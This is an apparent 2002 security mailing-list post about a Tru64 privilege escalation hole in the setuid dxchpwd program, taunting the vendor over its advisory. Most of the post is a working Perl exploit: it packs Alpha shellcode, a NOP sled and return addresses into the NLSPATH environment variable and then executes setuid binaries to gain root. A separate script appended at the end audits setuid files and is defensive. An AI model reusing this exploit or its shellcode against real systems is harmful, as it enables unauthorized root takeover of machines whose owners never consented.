Message-ID: <001f01c23cb5$6a9a4f00$0301000a@k7ezizjvt9gjdv>
From: dotslash at snosoft.com (KF)
Subject: In regards to ... http://online.securityfocus.com/bid/5382
In regards to ... http://online.securityfocus.com/bid/5382 and
http://ftp.support.compaq.com/patches/public/Readmes/unix/t64v51b19-c0136900-14951-es-20020730.README
- SSRT2262 /usr/tcb/bin/dxchpwd (Severity - Medium) why medium? Because the public had not seen an exploit?
This ECO has not been through an exhaustive field test process.
Due to the experimental stage of this ECO/workaround, Hewlett-Packard
makes no representations regarding its use or performance. The
customer shall have the sole responsibility for adequate protection
and back-up data used in conjunction with this ECO/workaround.
^--- hrmm cute.
I think I can make one of those right quick too.
This SNOSoft Proof of Concept Tool has not been through an exhaustive
field test process. Due to the experimental stage of this Tool, SNOSoft
makes no representations regarding its use or performance. The
customer of Compaq / HP shall have the sole responsibility for adequate protection
and back-up data used in conjunction with his or her own system and the use of the
following SNO/Proof of Concept Tool.
Official SNO workaround is:
See vendor or if paranoid chmod -s everything in sight.
This is supposed to be the vendor fix... I have not tested it. I assume with the
coordination from CERT and the conscious decision to release a public patch
that the vendor has provided a good workaround.
http://ftp.support.compaq.com/patches/public/Readmes/unix/t64v51b19-c0136900-14951-es-20020730.README
Please note after all the public drama with HP look whose name ends up in the credit section. *grin*
Good find guys... let's give the HP dev staff a round of applause. *sarcasm*
Tru64 DXCHPWD Local Privilege Escalation Vulnerability
Credit:
Published in a Compaq security advisory.
Hrmm how nice of them to mention us.
I will give someone a cookie if they can tell me when NLSPATH was first a big issue on OTHER unix systems.
I hope this isn't broken... if it is don't whine to me ... fix it.
--- begin copyrighted material
#!/usr/bin/perl -w
#
# stripey (stripey@...soft.com)
#
# This code is copyrighted by Snosoft
# http://www.snosoft.com
# If you are a direct employee of HP or Compaq
# you are not allowed to look at this program or use it.
# in order to protect our copyright on this
# program we have crippled it (at least) by adding
# _IWORKATHP to some part of the code. If
# you do not work for HP or Compaq you may
# remove these letters at will provided this copyright notice
# remains attached to the header of this code.
# As stated above if you work at hp you should
# not even be reading at this point. However if
# you are please note that by removing the letters
# _IWORKATHP from this document you are violating
# the DMCA section 1201(a)
# Also please note that most of the targets in
# this are removed pending CERT releases.
$tgts{"0"} = pack("l",0x40010c04).":/usr/dt/bin/SORRY";
$tgts{"1"} = pack("l",0x400a7908).":/usr/bin/X11/CANTTELLYA";
$tgts{"2"} = pack("l",0x40014280).":/usr/sbin/HRMMM";
$tgts{"3"} = pack("l",0x4003c190).":/usr/bin/LALALALAL";
$tgts{"4"} = pack("l",0x400361f0).":/usr/bin/HARHAR";
$tgts{"5"} = pack("l",0x4009f2f8).":/usr/tcb/bin/dxchpwd";
$tgts{"6"} = pack("l",0x400120b0).":/usr/bin/OOPS";
$tgts{"7"} = pack("l",0x400105e8).":/usr/bin/DECLANR0X";
unless (($target,$offset,$align) = @ARGV,$align) {
print "\nUsage: $0 <target> <offset> <align>\n\nTargets:\n\n";
foreach $key (sort(keys %tgts)) {
($a,$b) = split(/\:/,$tgts{"$key"});
print "\t$key. $b\n";
}
print "\n";
exit 1;
}
($a,$b) = split(/\:/,$tgts{"$target"});
print "*** Target: $b, Offset: $offset, Align: $align ***\n\n";
$ret = pack("ll",(unpack("l",$a)+$offset), 0x1);
# GOBBLES someday I will switch gears in the sweat shop and
# get that shellcode written up. That was quite the entertaining
# talk or speech or whatever this weekend.
# shellcode by Taeho Oh
$sc .= "\x30\x15\xd9\x43\x11\x74\xf0\x47\x12\x14\x02\x42";
$sc .= "\xfc\xff\x32\xb2\x12\x94\x09\x42\xfc\xff\x32\xb2";
$sc .= "\xff\x47\x3f\x26\x1f\x04\x31\x22\xfc\xff\x30\xb2";
$sc .= "\xf7\xff\x1f\xd2\x10\x04\xff\x47\x11\x14\xe3\x43";
$sc .= "\x20\x35\x20\x42\xff\xff\xff\xff\x30\x15\xd9\x43";
$sc .= "\x31\x15\xd8\x43\x12\x04\xff\x47\x40\xff\x1e\xb6";
$sc .= "\x48\xff\xfe\xb7\x98\xff\x7f\x26\xd0\x8c\x73\x22";
$sc .= "\x13\x05\xf3\x47\x3c\xff\x7e\xb2\x69\x6e\x7f\x26";
$sc .= "\x2f\x62\x73\x22\x38\xff\x7e\xb2\x13\x94\xe7\x43";
$sc .= "\x20\x35\x60\x42\xff\xff\xff\xff";
$tlen = (1024-(length($sc)))/4;
$buf .= "B"x$align;
$buf .= pack("l",0x47ff041f)x($tlen-1);
$buf .= $sc;
$buf .= $ret;
$ENV{"NLSPATH"} = $buf;
if ($target == 7) { print "Hit ctrl-d...\n"; }
if ($target == 6) {
exec("$b","-d","a=asdf","-c","_IWORKATHP/tmp/","\'\$\{a\}\'");
} else {
exec("$b");
}
---- end copyrighted material
-KF
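The "chmod -s everything in sight" workaround above is blunt: stripping setuid from every binary breaks programs such as passwd that legitimately need it. The script below, added here as an example and not part of the original post or SNOSoft's tool, is the auditing step an administrator would run first: it lists the setuid/setgid files under a given root so each one can be judged individually, and strips the bits from a single file only when told to. The directory argument and the helper names are assumptions for this example.

```shell
#!/bin/sh
# Added example: audit setuid/setgid binaries before deciding which to strip.
# Not from the original post; function names and arguments are assumptions.

# List regular files under $1 that carry the setuid (4000) or setgid (2000) bit.
# -xdev keeps the search on one filesystem so NFS and proc mounts are skipped.
list_setuid_binaries() {
    find "$1" -xdev -type f \( -perm -4000 -o -perm -2000 \) -print 2>/dev/null | sort
}

# Count the setuid/setgid files under $1 (handy for a before/after comparison).
count_setuid_binaries() {
    list_setuid_binaries "$1" | wc -l | tr -d ' '
}

# Remove only the setuid and setgid bits from one file, leaving rwx bits alone.
# This is the targeted form of the post's "chmod -s" workaround.
strip_setuid() {
    chmod u-s,g-s "$1"
}

# Stand-alone usage: audit a root directory given on the command line.
if [ -n "$1" ]; then
    echo "setuid/setgid files under $1:"
    list_setuid_binaries "$1"
    echo "total: $(count_setuid_binaries "$1")"
fi
```

Run it as `sh audit_suid.sh /usr` to get the list, compare it against the vendor's README for the binaries it names (here /usr/tcb/bin/dxchpwd), and call `strip_setuid` only on the ones you have decided to disable pending the ECO.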